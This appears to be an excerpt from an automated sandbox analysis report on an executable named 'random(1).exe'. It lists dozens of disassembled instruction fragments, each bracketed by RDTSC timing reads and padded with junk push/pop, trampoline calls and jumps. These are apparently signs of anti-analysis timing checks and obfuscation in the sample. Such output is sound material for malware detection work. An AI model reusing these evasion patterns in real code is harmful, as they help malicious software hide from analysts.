Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 108B879 second address: 108B8FC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F06D8518550h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e push edx 0x0000000f call 00007F06D8518548h 0x00000014 pop edx 0x00000015 mov dword ptr [esp+04h], edx 0x00000019 add dword ptr [esp+04h], 00000019h 0x00000021 inc edx 0x00000022 push edx 0x00000023 ret 0x00000024 pop edx 0x00000025 ret 0x00000026 mov dword ptr [ebp+122D3880h], edi 0x0000002c push 00000000h 0x0000002e push 00000000h 0x00000030 push ebx 0x00000031 call 00007F06D8518548h 0x00000036 pop ebx 0x00000037 mov dword ptr [esp+04h], ebx 0x0000003b add dword ptr [esp+04h], 0000001Ch 0x00000043 inc ebx 0x00000044 push ebx 0x00000045 ret 0x00000046 pop ebx 0x00000047 ret 0x00000048 or dword ptr [ebp+122D3780h], edx 0x0000004e jo 00007F06D851854Ch 0x00000054 mov dword ptr [ebp+122D1772h], edi 0x0000005a push 00000000h 0x0000005c mov edi, dword ptr [ebp+122D25D5h] 0x00000062 xchg eax, ebx 0x00000063 push esi 0x00000064 pushad 0x00000065 push eax 0x00000066 push edx 0x00000067 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 108B8FC second address: 108B930 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F06D8B4D9D3h 0x00000009 popad 0x0000000a pop esi 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f je 00007F06D8B4D9C6h 0x00000015 jmp 00007F06D8B4D9D0h 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 108CF39 second address: 108CF3F instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 108CF3F second address: 108CFAC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 js 00007F06D8B4D9C6h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e nop 0x0000000f mov di, dx 0x00000012 push 00000000h 0x00000014 push 00000000h 0x00000016 push ebp 0x00000017 call 00007F06D8B4D9C8h 0x0000001c pop ebp 0x0000001d mov dword ptr [esp+04h], ebp 0x00000021 add dword ptr [esp+04h], 0000001Bh 0x00000029 inc ebp 0x0000002a push ebp 0x0000002b ret 0x0000002c pop ebp 0x0000002d ret 0x0000002e pushad 0x0000002f and eax, dword ptr [ebp+122D29F3h] 0x00000035 cmc 0x00000036 popad 0x00000037 push 00000000h 0x00000039 push 00000000h 0x0000003b push edx 0x0000003c call 00007F06D8B4D9C8h 0x00000041 pop edx 0x00000042 mov dword ptr [esp+04h], edx 0x00000046 add dword ptr [esp+04h], 00000016h 0x0000004e inc edx 0x0000004f push edx 0x00000050 ret 0x00000051 pop edx 0x00000052 ret 0x00000053 or esi, 3A5567D4h 0x00000059 push eax 0x0000005a push eax 0x0000005b push edx 0x0000005c push ebx 0x0000005d pushad 0x0000005e popad 0x0000005f pop ebx 0x00000060 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 108CC96 second address: 108CC9B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 108CC9B second address: 108CCA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 1091727 second address: 109172B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 1091D1C second address: 1091D20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 1092D36 second address: 1092D49 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F06D8518548h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 1092D49 second address: 1092D4D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 1092D4D second address: 1092D53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 1092D53 second address: 1092D6D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F06D8B4D9D6h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 1091F3F second address: 1091F5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007F06D8518557h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 1099722 second address: 109972C instructions: 0x00000000 rdtsc 0x00000002 jl 00007F06D8B4D9C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 109972C second address: 1099732 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 1099732 second address: 1099736 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 1092F04 second address: 1092F10 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 push eax 0x00000008 push edi 0x00000009 push ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 1099736 second address: 1099743 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push ecx 0x0000000a push ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 1096897 second address: 109689D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 109689D second address: 10968DA instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007F06D8B4D9D9h 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d jmp 00007F06D8B4D9D8h 0x00000012 push eax 0x00000013 push edx 0x00000014 push edi 0x00000015 pop edi 0x00000016 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10968DA second address: 10968DE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 1093FF2 second address: 1093FF8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 1093FF8 second address: 1093FFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 1093FFC second address: 109400D instructions: 0x00000000 rdtsc 0x00000002 jne 00007F06D8B4D9C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 109B7AC second address: 109B7B6 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F06D851854Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 109B7B6 second address: 109B825 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 push 00000000h 0x0000000b push ecx 0x0000000c call 00007F06D8B4D9C8h 0x00000011 pop ecx 0x00000012 mov dword ptr [esp+04h], ecx 0x00000016 add dword ptr [esp+04h], 00000015h 0x0000001e inc ecx 0x0000001f push ecx 0x00000020 ret 0x00000021 pop ecx 0x00000022 ret 0x00000023 clc 0x00000024 mov dword ptr [ebp+122D2043h], edi 0x0000002a push 00000000h 0x0000002c push 00000000h 0x0000002e push edi 0x0000002f call 00007F06D8B4D9C8h 0x00000034 pop edi 0x00000035 mov dword ptr [esp+04h], edi 0x00000039 add dword ptr [esp+04h], 00000015h 0x00000041 inc edi 0x00000042 push edi 0x00000043 ret 0x00000044 pop edi 0x00000045 ret 0x00000046 mov dword ptr [ebp+12463B99h], ecx 0x0000004c add bx, BFA7h 0x00000051 mov ebx, dword ptr [ebp+122D215Ah] 0x00000057 push 00000000h 0x00000059 add bx, E144h 0x0000005e xchg eax, esi 0x0000005f push eax 0x00000060 push edx 0x00000061 push eax 0x00000062 push edx 0x00000063 jnp 00007F06D8B4D9C6h 0x00000069 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 109B825 second address: 109B829 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 109B829 second address: 109B82F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 1098952 second address: 109895C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007F06D8518546h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 109A8B5 second address: 109A8B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 109B997 second address: 109B99D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 109D827 second address: 109D848 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F06D8B4D9D1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b jns 00007F06D8B4D9D4h 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 109D848 second address: 109D84C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 109CA6D second address: 109CA71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 109CB7F second address: 109CB83 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 109EBAD second address: 109EBB7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007F06D8B4D9C6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10A1818 second address: 10A181C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10A181C second address: 10A1822 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10A0949 second address: 10A09E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 popad 0x00000006 push eax 0x00000007 jmp 00007F06D8518558h 0x0000000c nop 0x0000000d push 00000000h 0x0000000f push edi 0x00000010 call 00007F06D8518548h 0x00000015 pop edi 0x00000016 mov dword ptr [esp+04h], edi 0x0000001a add dword ptr [esp+04h], 00000018h 0x00000022 inc edi 0x00000023 push edi 0x00000024 ret 0x00000025 pop edi 0x00000026 ret 0x00000027 add dword ptr [ebp+122D3672h], edx 0x0000002d push dword ptr fs:[00000000h] 0x00000034 movzx edi, di 0x00000037 mov dword ptr fs:[00000000h], esp 0x0000003e push esi 0x0000003f mov ebx, 2615F3AEh 0x00000044 pop edi 0x00000045 mov eax, dword ptr [ebp+122D05E9h] 0x0000004b mov dword ptr [ebp+122D38A3h], ebx 0x00000051 push FFFFFFFFh 0x00000053 push 00000000h 0x00000055 push ebp 0x00000056 call 00007F06D8518548h 0x0000005b pop ebp 0x0000005c mov dword ptr [esp+04h], ebp 0x00000060 add dword ptr [esp+04h], 00000015h 0x00000068 inc ebp 0x00000069 push ebp 0x0000006a ret 0x0000006b pop ebp 0x0000006c ret 0x0000006d add bh, 00000055h 0x00000070 push eax 0x00000071 push eax 0x00000072 push edx 0x00000073 jno 00007F06D851854Ch 0x00000079 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10A1AD3 second address: 10A1AEB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F06D8B4D9D3h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10A2A4A second address: 10A2A4E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 104BF37 second address: 104BF3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 104BF3B second address: 104BF50 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F06D851854Bh 0x00000007 jbe 00007F06D8518546h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 104BF50 second address: 104BF56 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 104BF56 second address: 104BF60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F06D8518546h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 104BF60 second address: 104BF64 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 104BF64 second address: 104BF86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F06D8518553h 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push ebx 0x00000010 push eax 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 104BF86 second address: 104BF8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 1041BF5 second address: 1041BF9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10AA679 second address: 10AA688 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push edx 0x00000007 pop edx 0x00000008 popad 0x00000009 popad 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10AA688 second address: 10AA69B instructions: 0x00000000 rdtsc 0x00000002 jno 00007F06D8518546h 0x00000008 jp 00007F06D8518546h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push ebx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10AAB6B second address: 10AAB6F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10B2450 second address: 10B2458 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10B2458 second address: 10B2487 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F06D8B4D9C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c pushad 0x0000000d push eax 0x0000000e jmp 00007F06D8B4D9CDh 0x00000013 pop eax 0x00000014 push edi 0x00000015 jl 00007F06D8B4D9C6h 0x0000001b pop edi 0x0000001c popad 0x0000001d mov eax, dword ptr [esp+04h] 0x00000021 push eax 0x00000022 push edx 0x00000023 push ecx 0x00000024 pushad 0x00000025 popad 0x00000026 pop ecx 0x00000027 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10B2487 second address: 10B24A7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F06D8518555h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10B24A7 second address: 10B24AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10B24AB second address: 10B24D7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b popad 0x0000000c popad 0x0000000d mov dword ptr [esp+04h], eax 0x00000011 jng 00007F06D8518561h 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F06D8518553h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10B7785 second address: 10B77A4 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F06D8B4D9D9h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10B640E second address: 10B6418 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F06D8518546h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10B6418 second address: 10B6447 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F06D8B4D9C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jg 00007F06D8B4D9E0h 0x00000011 pushad 0x00000012 popad 0x00000013 jmp 00007F06D8B4D9D8h 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10B6447 second address: 10B644B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10B644B second address: 10B644F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10B644F second address: 10B6455 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10B6DC8 second address: 10B6DCC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10B6F14 second address: 10B6F1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10B6F1E second address: 10B6F28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F06D8B4D9C6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10B6F28 second address: 10B6F6B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 jmp 00007F06D8518559h 0x0000000e pushad 0x0000000f popad 0x00000010 pop esi 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F06D8518556h 0x00000018 jp 00007F06D8518546h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10B724F second address: 10B725D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F06D8B4D9C6h 0x0000000a popad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10B725D second address: 10B7282 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pushad 0x00000007 popad 0x00000008 jns 00007F06D8518546h 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F06D8518554h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10B7282 second address: 10B7288 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10B7288 second address: 10B72A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F06D8518550h 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10B72A3 second address: 10B72C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 jc 00007F06D8B4D9E3h 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F06D8B4D9D5h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10B7459 second address: 10B7469 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F06D8518546h 0x00000008 jnp 00007F06D8518546h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10B7469 second address: 10B746E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10B746E second address: 10B747A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10B75F7 second address: 10B7614 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F06D8B4D9D2h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d pop eax 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10BC394 second address: 10BC398 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10BC515 second address: 10BC549 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F06D8B4D9C6h 0x0000000a jmp 00007F06D8B4D9D2h 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 jnp 00007F06D8B4D9D2h 0x00000018 jmp 00007F06D8B4D9CAh 0x0000001d push edx 0x0000001e pop edx 0x0000001f pushad 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10BC549 second address: 10BC551 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10BBAB6 second address: 10BBABA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10BBABA second address: 10BBACE instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 je 00007F06D851854Eh 0x0000000c rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10BBACE second address: 10BBB05 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F06D8B4D9D2h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push ebx 0x0000000c push eax 0x0000000d pop eax 0x0000000e jmp 00007F06D8B4D9D6h 0x00000013 pop ebx 0x00000014 push eax 0x00000015 push edx 0x00000016 push ebx 0x00000017 pop ebx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10BBB05 second address: 10BBB09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10BC870 second address: 10BC874 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10BC874 second address: 10BC889 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b jns 00007F06D8518546h 0x00000011 push edx 0x00000012 pop edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10BCB20 second address: 10BCB28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
